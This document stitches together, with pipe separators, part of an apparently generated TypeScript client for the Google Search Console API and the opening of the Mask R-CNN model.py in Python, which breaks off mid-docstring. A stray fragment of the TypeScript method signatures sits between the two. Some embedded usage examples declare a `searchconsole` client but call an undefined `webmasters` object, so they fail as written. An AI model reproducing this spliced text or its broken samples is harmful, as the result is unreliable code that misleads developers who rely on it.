* // The URI of the property as defined in Search Console. **Examples:** `http://www.example.com/` or `sc-domain:example.com`.
* siteUrl: 'placeholder-value',
* });
* console.log(res.data);
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
delete(
params: Params$Resource$Sites$Delete,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
delete(
params?: Params$Resource$Sites$Delete,
options?: MethodOptions
): GaxiosPromise<void>;
delete(
params: Params$Resource$Sites$Delete,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
delete(
params: Params$Resource$Sites$Delete,
options: MethodOptions | BodyResponseCallback<void>,
callback: BodyResponseCallback<void>
): void;
delete(
params: Params$Resource$Sites$Delete,
callback: BodyResponseCallback<void>
): void;
delete(callback: BodyResponseCallback<void>): void;
delete(
paramsOrCallback?:
| Params$Resource$Sites$Delete
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<void>
| BodyResponseCallback<Readable>,
callback?: BodyResponseCallback<void> | BodyResponseCallback<Readable>
): void | GaxiosPromise<void> | GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sites$Delete;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sites$Delete;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (rootUrl + '/webmasters/v3/sites/{siteUrl}').replace(
/([^:]\/)\/+/g,
'$1'
),
method: 'DELETE',
},
options
),
params,
requiredParams: ['siteUrl'],
pathParams: ['siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<void>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<void>(parameters);
}
}
/**
* Retrieves information about specific site.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
* // - Login into gcloud by running:
* // `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: [
* 'https://www.googleapis.com/auth/webmasters',
* 'https://www.googleapis.com/auth/webmasters.readonly',
* ],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
* const res = await webmasters.sites.get({
* // The URI of the property as defined in Search Console. **Examples:** `http://www.example.com/` or `sc-domain:example.com`.
* siteUrl: 'placeholder-value',
* });
* console.log(res.data);
*
* // Example response
* // {
* // "permissionLevel": "my_permissionLevel",
* // "siteUrl": "my_siteUrl"
* // }
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
get(
params: Params$Resource$Sites$Get,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
get(
params?: Params$Resource$Sites$Get,
options?: MethodOptions
): GaxiosPromise<Schema$WmxSite>;
get(
params: Params$Resource$Sites$Get,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
get(
params: Params$Resource$Sites$Get,
options: MethodOptions | BodyResponseCallback<Schema$WmxSite>,
callback: BodyResponseCallback<Schema$WmxSite>
): void;
get(
params: Params$Resource$Sites$Get,
callback: BodyResponseCallback<Schema$WmxSite>
): void;
get(callback: BodyResponseCallback<Schema$WmxSite>): void;
get(
paramsOrCallback?:
| Params$Resource$Sites$Get
| BodyResponseCallback<Schema$WmxSite>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<Schema$WmxSite>
| BodyResponseCallback<Readable>,
callback?:
| BodyResponseCallback<Schema$WmxSite>
| BodyResponseCallback<Readable>
): void | GaxiosPromise<Schema$WmxSite> | GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sites$Get;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sites$Get;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (rootUrl + '/webmasters/v3/sites/{siteUrl}').replace(
/([^:]\/)\/+/g,
'$1'
),
method: 'GET',
},
options
),
params,
requiredParams: ['siteUrl'],
pathParams: ['siteUrl'],
context: this.context,
};
if (callback) {
createAPIRequest<Schema$WmxSite>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<Schema$WmxSite>(parameters);
}
}
/**
* Lists the user's Search Console sites.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
* // - Login into gcloud by running:
* // `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: [
* 'https://www.googleapis.com/auth/webmasters',
* 'https://www.googleapis.com/auth/webmasters.readonly',
* ],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
* const res = await webmasters.sites.list({});
* console.log(res.data);
*
* // Example response
* // {
* // "siteEntry": []
* // }
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
list(
params: Params$Resource$Sites$List,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
list(
params?: Params$Resource$Sites$List,
options?: MethodOptions
): GaxiosPromise<Schema$SitesListResponse>;
list(
params: Params$Resource$Sites$List,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
list(
params: Params$Resource$Sites$List,
options: MethodOptions | BodyResponseCallback<Schema$SitesListResponse>,
callback: BodyResponseCallback<Schema$SitesListResponse>
): void;
list(
params: Params$Resource$Sites$List,
callback: BodyResponseCallback<Schema$SitesListResponse>
): void;
list(callback: BodyResponseCallback<Schema$SitesListResponse>): void;
list(
paramsOrCallback?:
| Params$Resource$Sites$List
| BodyResponseCallback<Schema$SitesListResponse>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<Schema$SitesListResponse>
| BodyResponseCallback<Readable>,
callback?:
| BodyResponseCallback<Schema$SitesListResponse>
| BodyResponseCallback<Readable>
):
| void
| GaxiosPromise<Schema$SitesListResponse>
| GaxiosPromise<Readable> {
let params = (paramsOrCallback || {}) as Params$Resource$Sites$List;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Sites$List;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (rootUrl + '/webmasters/v3/sites').replace(
/([^:]\/)\/+/g,
'$1'
),
method: 'GET',
},
options
),
params,
requiredParams: [],
pathParams: [],
context: this.context,
};
if (callback) {
createAPIRequest<Schema$SitesListResponse>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<Schema$SitesListResponse>(parameters);
}
}
}
export interface Params$Resource$Sites$Add extends StandardParameters {
/**
* The URL of the site to add.
*/
siteUrl?: string;
}
export interface Params$Resource$Sites$Delete extends StandardParameters {
/**
* The URI of the property as defined in Search Console. **Examples:** `http://www.example.com/` or `sc-domain:example.com`.
*/
siteUrl?: string;
}
export interface Params$Resource$Sites$Get extends StandardParameters {
/**
* The URI of the property as defined in Search Console. **Examples:** `http://www.example.com/` or `sc-domain:example.com`.
*/
siteUrl?: string;
}
export interface Params$Resource$Sites$List extends StandardParameters {}
export class Resource$Urltestingtools {
context: APIRequestContext;
mobileFriendlyTest: Resource$Urltestingtools$Mobilefriendlytest;
constructor(context: APIRequestContext) {
this.context = context;
this.mobileFriendlyTest = new Resource$Urltestingtools$Mobilefriendlytest(
this.context
);
}
}
export class Resource$Urltestingtools$Mobilefriendlytest {
context: APIRequestContext;
constructor(context: APIRequestContext) {
this.context = context;
}
/**
* Runs Mobile-Friendly Test for a given URL.
* @example
* ```js
* // Before running the sample:
* // - Enable the API at:
* // https://console.developers.google.com/apis/api/searchconsole.googleapis.com
* // - Login into gcloud by running:
* // `$ gcloud auth application-default login`
* // - Install the npm module by running:
* // `$ npm install googleapis`
*
* const {google} = require('googleapis');
* const searchconsole = google.searchconsole('v1');
*
* async function main() {
* const auth = new google.auth.GoogleAuth({
* // Scopes can be specified either as an array or as a single, space-delimited string.
* scopes: [],
* });
*
* // Acquire an auth client, and bind it to all future calls
* const authClient = await auth.getClient();
* google.options({auth: authClient});
*
* // Do the magic
* const res = await searchconsole.urlTestingTools.mobileFriendlyTest.run({
* // Request body metadata
* requestBody: {
* // request body parameters
* // {
* // "requestScreenshot": false,
* // "url": "my_url"
* // }
* },
* });
* console.log(res.data);
*
* // Example response
* // {
* // "mobileFriendliness": "my_mobileFriendliness",
* // "mobileFriendlyIssues": [],
* // "resourceIssues": [],
* // "screenshot": {},
* // "testStatus": {}
* // }
* }
*
* main().catch(e => {
* console.error(e);
* throw e;
* });
*
* ```
*
* @param params - Parameters for request
* @param options - Optionally override request options, such as `url`, `method`, and `encoding`.
* @param callback - Optional callback that handles the response.
* @returns A promise if used with async/await, or void if used with a callback.
*/
run(
params: Params$Resource$Urltestingtools$Mobilefriendlytest$Run,
options: StreamMethodOptions
): GaxiosPromise<Readable>;
run(
params?: Params$Resource$Urltestingtools$Mobilefriendlytest$Run,
options?: MethodOptions
): GaxiosPromise<Schema$RunMobileFriendlyTestResponse>;
run(
params: Params$Resource$Urltestingtools$Mobilefriendlytest$Run,
options: StreamMethodOptions | BodyResponseCallback<Readable>,
callback: BodyResponseCallback<Readable>
): void;
run(
params: Params$Resource$Urltestingtools$Mobilefriendlytest$Run,
options:
| MethodOptions
| BodyResponseCallback<Schema$RunMobileFriendlyTestResponse>,
callback: BodyResponseCallback<Schema$RunMobileFriendlyTestResponse>
): void;
run(
params: Params$Resource$Urltestingtools$Mobilefriendlytest$Run,
callback: BodyResponseCallback<Schema$RunMobileFriendlyTestResponse>
): void;
run(
callback: BodyResponseCallback<Schema$RunMobileFriendlyTestResponse>
): void;
run(
paramsOrCallback?:
| Params$Resource$Urltestingtools$Mobilefriendlytest$Run
| BodyResponseCallback<Schema$RunMobileFriendlyTestResponse>
| BodyResponseCallback<Readable>,
optionsOrCallback?:
| MethodOptions
| StreamMethodOptions
| BodyResponseCallback<Schema$RunMobileFriendlyTestResponse>
| BodyResponseCallback<Readable>,
callback?:
| BodyResponseCallback<Schema$RunMobileFriendlyTestResponse>
| BodyResponseCallback<Readable>
):
| void
| GaxiosPromise<Schema$RunMobileFriendlyTestResponse>
| GaxiosPromise<Readable> {
let params = (paramsOrCallback ||
{}) as Params$Resource$Urltestingtools$Mobilefriendlytest$Run;
let options = (optionsOrCallback || {}) as MethodOptions;
if (typeof paramsOrCallback === 'function') {
callback = paramsOrCallback;
params = {} as Params$Resource$Urltestingtools$Mobilefriendlytest$Run;
options = {};
}
if (typeof optionsOrCallback === 'function') {
callback = optionsOrCallback;
options = {};
}
const rootUrl =
options.rootUrl || 'https://searchconsole.googleapis.com/';
const parameters = {
options: Object.assign(
{
url: (
rootUrl + '/v1/urlTestingTools/mobileFriendlyTest:run'
).replace(/([^:]\/)\/+/g, '$1'),
method: 'POST',
},
options
),
params,
requiredParams: [],
pathParams: [],
context: this.context,
};
if (callback) {
createAPIRequest<Schema$RunMobileFriendlyTestResponse>(
parameters,
callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<Schema$RunMobileFriendlyTestResponse>(
parameters
);
}
}
}
export interface Params$Resource$Urltestingtools$Mobilefriendlytest$Run
extends StandardParameters {
/**
* Request body metadata
*/
requestBody?: Schema$RunMobileFriendlyTestRequest;
}
} | callback: BodyResponseCallback<void>
): void; |
model.py | """
Mask R-CNN
The main Mask R-CNN model implementation.
Copyright (c) 2017 Matterport, Inc.
Licensed under the MIT License (see LICENSE for details)
Written by Waleed Abdulla
"""
import os
import datetime
import re
import math
from collections import OrderedDict
import multiprocessing
import numpy as np
import tensorflow as tf
import tensorflow.keras as keras
import tensorflow.keras.backend as K
import tensorflow.keras.layers as KL
import tensorflow.keras.layers as KE
import tensorflow.keras.utils as KU
import tensorflow.keras.models as KM
from mrcnn import utils
# Requires TensorFlow 2.0+
from distutils.version import LooseVersion
assert LooseVersion(tf.__version__) >= LooseVersion("2.0")
############################################################
# Utility Functions
############################################################
def log(text, array=None):
"""Prints a text message. And, optionally, if a Numpy array is provided it
prints it's shape, min, and max values.
"""
if array is not None:
text = text.ljust(25)
text += ("shape: {:20} ".format(str(array.shape)))
if array.size:
text += ("min: {:10.5f} max: {:10.5f}".format(array.min(), array.max()))
else:
text += ("min: {:10} max: {:10}".format("", ""))
text += " {}".format(array.dtype)
print(text)
class BatchNorm(KL.BatchNormalization):
"""Extends the Keras BatchNormalization class to allow a central place
to make changes if needed.
Batch normalization has a negative effect on training if batches are small
so this layer is often frozen (via setting in Config class) and functions
as linear layer.
"""
def call(self, inputs, training=None):
"""
Note about training values:
None: Train BN layers. This is the normal mode
False: Freeze BN layers. Good when batch size is small
True: (don't use). Set layer in training mode even when making inferences
"""
return super(self.__class__, self).call(inputs, training=training)
def compute_backbone_shapes(config, image_shape):
"""Computes the width and height of each stage of the backbone network.
Returns:
[N, (height, width)]. Where N is the number of stages
"""
if callable(config.BACKBONE):
return config.COMPUTE_BACKBONE_SHAPE(image_shape)
# Currently supports ResNet only
assert config.BACKBONE in ["resnet50", "resnet101"]
return np.array(
[[int(math.ceil(image_shape[0] / stride)),
int(math.ceil(image_shape[1] / stride))]
for stride in config.BACKBONE_STRIDES])
############################################################
# Resnet Graph
############################################################
# Code adopted from:
# https://github.com/fchollet/deep-learning-models/blob/master/resnet50.py
def identity_block(input_tensor, kernel_size, filters, stage, block,
use_bias=True, train_bn=True):
"""The identity_block is the block that has no conv layer at shortcut
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_bias: Boolean. To use or not use a bias in conv layers.
train_bn: Boolean. Train or freeze Batch Norm layers
"""
nb_filter1, nb_filter2, nb_filter3 = filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = KL.Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a',
use_bias=use_bias)(input_tensor)
x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',
name=conv_name_base + '2b', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c',
use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)
x = KL.Add()([x, input_tensor])
x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)
return x
def conv_block(input_tensor, kernel_size, filters, stage, block,
strides=(2, 2), use_bias=True, train_bn=True):
"""conv_block is the block that has a conv layer at shortcut
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_bias: Boolean. To use or not use a bias in conv layers.
train_bn: Boolean. Train or freeze Batch Norm layers
Note that from stage 3, the first conv layer at main path is with subsample=(2,2)
And the shortcut should have subsample=(2,2) as well
"""
nb_filter1, nb_filter2, nb_filter3 = filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = KL.Conv2D(nb_filter1, (1, 1), strides=strides,
name=conv_name_base + '2a', use_bias=use_bias)(input_tensor)
x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',
name=conv_name_base + '2b', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base +
'2c', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)
shortcut = KL.Conv2D(nb_filter3, (1, 1), strides=strides,
name=conv_name_base + '1', use_bias=use_bias)(input_tensor)
shortcut = BatchNorm(name=bn_name_base + '1')(shortcut, training=train_bn)
x = KL.Add()([x, shortcut])
x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)
return x
def resnet_graph(input_image, architecture, stage5=False, train_bn=True):
"""Build a ResNet graph.
architecture: Can be resnet50 or resnet101
stage5: Boolean. If False, stage5 of the network is not created
train_bn: Boolean. Train or freeze Batch Norm layers
"""
assert architecture in ["resnet50", "resnet101"]
# Stage 1
x = KL.ZeroPadding2D((3, 3))(input_image)
x = KL.Conv2D(64, (7, 7), strides=(2, 2), name='conv1', use_bias=True)(x)
x = BatchNorm(name='bn_conv1')(x, training=train_bn)
x = KL.Activation('relu')(x)
C1 = x = KL.MaxPooling2D((3, 3), strides=(2, 2), padding="same")(x)
# Stage 2
x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), train_bn=train_bn)
x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', train_bn=train_bn)
C2 = x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', train_bn=train_bn)
# Stage 3
x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', train_bn=train_bn)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', train_bn=train_bn)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', train_bn=train_bn)
C3 = x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', train_bn=train_bn)
# Stage 4
x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', train_bn=train_bn)
block_count = {"resnet50": 5, "resnet101": 22}[architecture]
for i in range(block_count):
x = identity_block(x, 3, [256, 256, 1024], stage=4, block=chr(98 + i), train_bn=train_bn)
C4 = x
# Stage 5
if stage5:
x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', train_bn=train_bn)
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', train_bn=train_bn)
C5 = x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', train_bn=train_bn)
else:
C5 = None
return [C1, C2, C3, C4, C5]
############################################################
# Proposal Layer
############################################################
def apply_box_deltas_graph(boxes, deltas):
"""Applies the given deltas to the given boxes.
boxes: [N, (y1, x1, y2, x2)] boxes to update
deltas: [N, (dy, dx, log(dh), log(dw))] refinements to apply
"""
# Convert to y, x, h, w
height = boxes[:, 2] - boxes[:, 0]
width = boxes[:, 3] - boxes[:, 1]
center_y = boxes[:, 0] + 0.5 * height
center_x = boxes[:, 1] + 0.5 * width
# Apply deltas
center_y += deltas[:, 0] * height
center_x += deltas[:, 1] * width
height *= tf.exp(deltas[:, 2])
width *= tf.exp(deltas[:, 3])
# Convert back to y1, x1, y2, x2
y1 = center_y - 0.5 * height
x1 = center_x - 0.5 * width
y2 = y1 + height
x2 = x1 + width
result = tf.stack([y1, x1, y2, x2], axis=1, name="apply_box_deltas_out")
return result
def clip_boxes_graph(boxes, window):
"""
boxes: [N, (y1, x1, y2, x2)]
window: [4] in the form y1, x1, y2, x2
"""
# Split
wy1, wx1, wy2, wx2 = tf.split(window, 4)
y1, x1, y2, x2 = tf.split(boxes, 4, axis=1)
# Clip
y1 = tf.maximum(tf.minimum(y1, wy2), wy1)
x1 = tf.maximum(tf.minimum(x1, wx2), wx1)
y2 = tf.maximum(tf.minimum(y2, wy2), wy1)
x2 = tf.maximum(tf.minimum(x2, wx2), wx1)
clipped = tf.concat([y1, x1, y2, x2], axis=1, name="clipped_boxes")
clipped.set_shape((clipped.shape[0], 4))
return clipped
class ProposalLayer(KE.Layer):
"""Receives anchor scores and selects a subset to pass as proposals
to the second stage. Filtering is done based on anchor scores and
non-max suppression to remove overlaps. It also applies bounding
box refinement deltas to anchors.
Inputs:
rpn_probs: [batch, num_anchors, (bg prob, fg prob)]
rpn_bbox: [batch, num_anchors, (dy, dx, log(dh), log(dw))]
anchors: [batch, num_anchors, (y1, x1, y2, x2)] anchors in normalized coordinates
Returns:
Proposals in normalized coordinates [batch, rois, (y1, x1, y2, x2)]
"""
def __init__(self, proposal_count, nms_threshold, config=None, **kwargs):
super(ProposalLayer, self).__init__(**kwargs)
self.config = config
self.proposal_count = proposal_count
self.nms_threshold = nms_threshold
def call(self, inputs):
# Box Scores. Use the foreground class confidence. [Batch, num_rois, 1]
scores = inputs[0][:, :, 1]
# Box deltas [batch, num_rois, 4]
deltas = inputs[1]
deltas = deltas * np.reshape(self.config.RPN_BBOX_STD_DEV, [1, 1, 4])
# Anchors
anchors = inputs[2]
# Improve performance by trimming to top anchors by score
# and doing the rest on the smaller subset.
pre_nms_limit = tf.minimum(self.config.PRE_NMS_LIMIT, tf.shape(anchors)[1])
ix = tf.nn.top_k(scores, pre_nms_limit, sorted=True,
name="top_anchors").indices
scores = utils.batch_slice([scores, ix], lambda x, y: tf.gather(x, y),
self.config.IMAGES_PER_GPU)
deltas = utils.batch_slice([deltas, ix], lambda x, y: tf.gather(x, y),
self.config.IMAGES_PER_GPU)
pre_nms_anchors = utils.batch_slice([anchors, ix], lambda a, x: tf.gather(a, x),
self.config.IMAGES_PER_GPU,
names=["pre_nms_anchors"])
# Apply deltas to anchors to get refined anchors.
# [batch, N, (y1, x1, y2, x2)]
boxes = utils.batch_slice([pre_nms_anchors, deltas],
lambda x, y: apply_box_deltas_graph(x, y),
self.config.IMAGES_PER_GPU,
names=["refined_anchors"])
# Clip to image boundaries. Since we're in normalized coordinates,
# clip to 0..1 range. [batch, N, (y1, x1, y2, x2)]
window = np.array([0, 0, 1, 1], dtype=np.float32)
boxes = utils.batch_slice(boxes,
lambda x: clip_boxes_graph(x, window),
self.config.IMAGES_PER_GPU,
names=["refined_anchors_clipped"])
# Filter out small boxes
# According to Xinlei Chen's paper, this reduces detection accuracy
# for small objects, so we're skipping it.
# Non-max suppression
def nms(boxes, scores):
indices = tf.image.non_max_suppression(
boxes, scores, self.proposal_count,
self.nms_threshold, name="rpn_non_max_suppression")
proposals = tf.gather(boxes, indices)
# Pad if needed
padding = tf.maximum(self.proposal_count - tf.shape(proposals)[0], 0)
proposals = tf.pad(proposals, [(0, padding), (0, 0)])
return proposals
proposals = utils.batch_slice([boxes, scores], nms,
self.config.IMAGES_PER_GPU)
return proposals
def compute_output_shape(self, input_shape):
return (None, self.proposal_count, 4)
############################################################
# ROIAlign Layer
############################################################
def log2_graph(x):
"""Implementation of Log2. TF doesn't have a native implementation."""
return tf.math.log(x) / tf.math.log(2.0)
class PyramidROIAlign(KE.Layer):
"""Implements ROI Pooling on multiple levels of the feature pyramid.
Params:
- pool_shape: [pool_height, pool_width] of the output pooled regions. Usually [7, 7]
Inputs:
- boxes: [batch, num_boxes, (y1, x1, y2, x2)] in normalized
coordinates. Possibly padded with zeros if not enough
boxes to fill the array.
- image_meta: [batch, (meta data)] Image details. See compose_image_meta()
- feature_maps: List of feature maps from different levels of the pyramid.
Each is [batch, height, width, channels]
Output:
Pooled regions in the shape: [batch, num_boxes, pool_height, pool_width, channels].
The width and height are those specific in the pool_shape in the layer
constructor.
"""
def __init__(self, pool_shape, **kwargs):
super(PyramidROIAlign, self).__init__(**kwargs)
self.pool_shape = tuple(pool_shape)
def call(self, inputs):
# Crop boxes [batch, num_boxes, (y1, x1, y2, x2)] in normalized coords
boxes = inputs[0]
# Image meta
# Holds details about the image. See compose_image_meta()
image_meta = inputs[1]
# Feature Maps. List of feature maps from different level of the
# feature pyramid. Each is [batch, height, width, channels]
feature_maps = inputs[2:]
# Assign each ROI to a level in the pyramid based on the ROI area.
y1, x1, y2, x2 = tf.split(boxes, 4, axis=2)
h = y2 - y1
w = x2 - x1
# Use shape of first image. Images in a batch must have the same size.
image_shape = parse_image_meta_graph(image_meta)['image_shape'][0]
# Equation 1 in the Feature Pyramid Networks paper. Account for
# the fact that our coordinates are normalized here.
# e.g. a 224x224 ROI (in pixels) maps to P4
image_area = tf.cast(image_shape[0] * image_shape[1], tf.float32)
roi_level = log2_graph(tf.sqrt(h * w) / (224.0 / tf.sqrt(image_area)))
roi_level = tf.minimum(5, tf.maximum(
2, 4 + tf.cast(tf.round(roi_level), tf.int32)))
roi_level = tf.squeeze(roi_level, 2)
# Loop through levels and apply ROI pooling to each. P2 to P5.
pooled = []
box_to_level = []
for i, level in enumerate(range(2, 6)):
ix = tf.where(tf.equal(roi_level, level))
level_boxes = tf.gather_nd(boxes, ix)
# Box indices for crop_and_resize.
box_indices = tf.cast(ix[:, 0], tf.int32)
# Keep track of which box is mapped to which level
box_to_level.append(ix)
# Stop gradient propogation to ROI proposals
level_boxes = tf.stop_gradient(level_boxes)
box_indices = tf.stop_gradient(box_indices)
# Crop and Resize
# From Mask R-CNN paper: "We sample four regular locations, so
# that we can evaluate either max or average pooling. In fact,
# interpolating only a single value at each bin center (without
# pooling) is nearly as effective."
#
# Here we use the simplified approach of a single value per bin,
# which is how it's done in tf.crop_and_resize()
# Result: [batch * num_boxes, pool_height, pool_width, channels]
pooled.append(tf.image.crop_and_resize(
feature_maps[i], level_boxes, box_indices, self.pool_shape,
method="bilinear"))
# Pack pooled features into one tensor
pooled = tf.concat(pooled, axis=0)
# Pack box_to_level mapping into one array and add another
# column representing the order of pooled boxes
box_to_level = tf.concat(box_to_level, axis=0)
box_range = tf.expand_dims(tf.range(tf.shape(box_to_level)[0]), 1)
box_to_level = tf.concat([tf.cast(box_to_level, tf.int32), box_range],
axis=1)
# Rearrange pooled features to match the order of the original boxes
# Sort box_to_level by batch then box index
# TF doesn't have a way to sort by two columns, so merge them and sort.
sorting_tensor = box_to_level[:, 0] * 100000 + box_to_level[:, 1]
ix = tf.nn.top_k(sorting_tensor, k=tf.shape(
box_to_level)[0]).indices[::-1]
ix = tf.gather(box_to_level[:, 2], ix)
pooled = tf.gather(pooled, ix)
# Re-add the batch dimension
shape = tf.concat([tf.shape(boxes)[:2], tf.shape(pooled)[1:]], axis=0)
pooled = tf.reshape(pooled, shape)
return pooled
def compute_output_shape(self, input_shape):
return input_shape[0][:2] + self.pool_shape + (input_shape[2][-1], )
############################################################
# Detection Target Layer
############################################################
def overlaps_graph(boxes1, boxes2):
"""Computes IoU overlaps between two sets of boxes.
boxes1, boxes2: [N, (y1, x1, y2, x2)].
"""
# 1. Tile boxes2 and repeat boxes1. This allows us to compare
# every boxes1 against every boxes2 without loops.
# TF doesn't have an equivalent to np.repeat() so simulate it
# using tf.tile() and tf.reshape.
b1 = tf.reshape(tf.tile(tf.expand_dims(boxes1, 1),
[1, 1, tf.shape(boxes2)[0]]), [-1, 4])
b2 = tf.tile(boxes2, [tf.shape(boxes1)[0], 1])
# 2. Compute intersections
b1_y1, b1_x1, b1_y2, b1_x2 = tf.split(b1, 4, axis=1)
b2_y1, b2_x1, b2_y2, b2_x2 = tf.split(b2, 4, axis=1)
y1 = tf.maximum(b1_y1, b2_y1)
x1 = tf.maximum(b1_x1, b2_x1)
y2 = tf.minimum(b1_y2, b2_y2)
x2 = tf.minimum(b1_x2, b2_x2)
intersection = tf.maximum(x2 - x1, 0) * tf.maximum(y2 - y1, 0)
# 3. Compute unions
b1_area = (b1_y2 - b1_y1) * (b1_x2 - b1_x1)
b2_area = (b2_y2 - b2_y1) * (b2_x2 - b2_x1)
union = b1_area + b2_area - intersection
# 4. Compute IoU and reshape to [boxes1, boxes2]
iou = intersection / union
overlaps = tf.reshape(iou, [tf.shape(boxes1)[0], tf.shape(boxes2)[0]])
return overlaps
def detection_targets_graph(proposals, gt_class_ids, gt_boxes, gt_masks, config):
"""Generates detection targets for one image. Subsamples proposals and
generates target class IDs, bounding box deltas, and masks for each.
Inputs:
proposals: [POST_NMS_ROIS_TRAINING, (y1, x1, y2, x2)] in normalized coordinates. Might
be zero padded if there are not enough proposals.
gt_class_ids: [MAX_GT_INSTANCES] int class IDs
gt_boxes: [MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized coordinates.
gt_masks: [height, width, MAX_GT_INSTANCES] of boolean type.
Returns: Target ROIs and corresponding class IDs, bounding box shifts,
and masks.
rois: [TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized coordinates
